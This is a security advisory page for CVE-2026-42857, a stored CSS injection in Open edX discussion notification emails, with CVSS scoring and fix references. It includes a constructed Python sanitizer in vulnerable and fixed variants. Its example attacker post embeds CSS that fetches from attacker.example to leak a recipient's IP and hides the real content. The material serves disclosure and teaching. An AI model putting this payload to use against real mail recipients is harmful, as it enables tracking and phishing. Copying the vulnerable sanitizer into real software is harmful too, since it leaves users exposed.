CVE Alert

CVE-2026-42857

MEDIUM 4.6

Open edX Platform: Stored CSS Injection in Email Notifications via Incomplete HTML Sanitization

CVSS Score
4.6
EPSS Score
0.0%
EPSS Percentile
0th

Open edX Platform enables the authoring and delivery of online learning at any scale. The HTML sanitizer clean_thread_html_body(), which cleans discussion post content before it is placed in discussion notification emails, fails to remove <style> tags from user-generated post content. The sanitizer's output is rendered with Django's |safe template filter in the email notification templates; |safe turns off Django's autoescaping, so the sanitizer is the only control between the post author's HTML and the recipient's mail client. Any enrolled student can therefore inject arbitrary CSS into email notifications sent to other users. This enables email tracking (IP address disclosure when the recipient's mail client fetches a remote resource referenced from the injected CSS), content spoofing, and phishing. The vulnerability is fixed in commit cddc25cd791bb78f76833896e4778f668861df12.
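The bug class described above, as an added Python illustration: this is constructed example code, not Open edX's clean_thread_html_body() or any other project code, and the allowlist, attribute rules, and attacker post are assumptions chosen to show the pattern. The vulnerable variant strips <script> and event-handler attributes but lets <style> through, so the CSS reaches the mail client verbatim once the template renders the result with |safe; the fixed variant drops the <style> element together with its body.

```python
from html import escape
from html.parser import HTMLParser

# Constructed example (not Open edX's clean_thread_html_body()): a minimal
# allowlist sanitizer for discussion-post HTML. Tag and attribute sets are
# assumptions chosen to illustrate the bug class, not the project's lists.
SAFE_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
             "blockquote", "code", "pre"}
SAFE_ATTRS = {"a": {"href"}}              # no style= attribute, no on* handlers
DROP_WITH_CONTENT = {"script", "style"}   # drop the element *and* its body


class Sanitizer(HTMLParser):
    def __init__(self, keep_style: bool) -> None:
        super().__init__(convert_charrefs=True)
        # keep_style=True models the vulnerable behaviour: <style> passes through.
        self.allowed = SAFE_TAGS | ({"style"} if keep_style else set())
        self.drop_content = DROP_WITH_CONTENT - self.allowed
        self.out: list[str] = []
        self.skip = 0   # >0 while inside an element dropped with its content
        self.raw = 0    # >0 while inside a <style> that is being passed through

    def handle_starttag(self, tag, attrs):
        if tag in self.drop_content:
            self.skip += 1
            return
        if self.skip or tag not in self.allowed:
            return      # unknown tag dropped; its text content is still emitted
        if tag == "style":
            self.raw += 1
        kept = ""
        for name, value in attrs:
            value = value or ""
            if name in SAFE_ATTRS.get(tag, set()) \
                    and not value.strip().lower().startswith("javascript:"):
                kept += f' {name}="{escape(value, quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in self.drop_content:
            self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in self.allowed and tag != "br":
            if tag == "style":
                self.raw = max(0, self.raw - 1)
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip:
            return
        # Inside a passed-through <style> the CSS is emitted verbatim, which is
        # exactly what lets attacker-controlled CSS reach the mail client.
        self.out.append(data if self.raw else escape(data, quote=False))


def clean(html: str, keep_style: bool) -> str:
    parser = Sanitizer(keep_style)
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


def vulnerable_clean(html: str) -> str:
    """Strips <script> and event handlers but leaves <style> intact."""
    return clean(html, keep_style=True)


def fixed_clean(html: str) -> str:
    """Drops <style> together with its CSS body."""
    return clean(html, keep_style=False)


# Constructed attacker post: a remote CSS background leaks the reader's IP
# when the mail client fetches it, and p{display:none} hides the real body.
ATTACKER_POST = (
    "<p>Hi all</p>"
    '<style>body{background:url("https://attacker.example/t?u=victim")} '
    "p{display:none}</style>"
    "<script>alert(1)</script>"
    '<p onclick="x()">See the <a href="https://example.org">syllabus</a></p>'
)

if __name__ == "__main__":
    print("vulnerable:", vulnerable_clean(ATTACKER_POST))
    print("fixed:     ", fixed_clean(ATTACKER_POST))
```

Two points worth checking in any real sanitizer of this kind: the `style=` attribute and `<link rel="stylesheet">` must be excluded as well as the `<style>` element, and a "strip the tag, keep the text" mode is acceptable for `<style>` only because bare CSS rendered as text is inert, whereas the intact element is not. Whether the injected CSS actually fires depends on the recipient's mail client honouring `<style>` and loading remote resources, which is consistent with the User Interaction: Required component of the CVSS vector.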

CWE CWE-79
Vendor openedx
Product openedx-platform
Published May 11, 2026
Last Updated May 13, 2026

CVSS v3 Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
Required
Scope
Unchanged
Confidentiality
Low
Integrity
Low
Availability
None

Affected Versions

openedx / openedx-platform
  < cddc25cd791bb78f76833896e4778f668861df12 (builds before the fix commit)
  >= sumac, < ulmo (named releases)

References

NVD, CVE.org, EPSS Data
GitHub advisory: https://github.com/openedx/openedx-platform/security/advisories/GHSA-4xv3-5j4x-q8g4
Fix commit: https://github.com/openedx/openedx-platform/commit/cddc25cd791bb78f76833896e4778f668861df12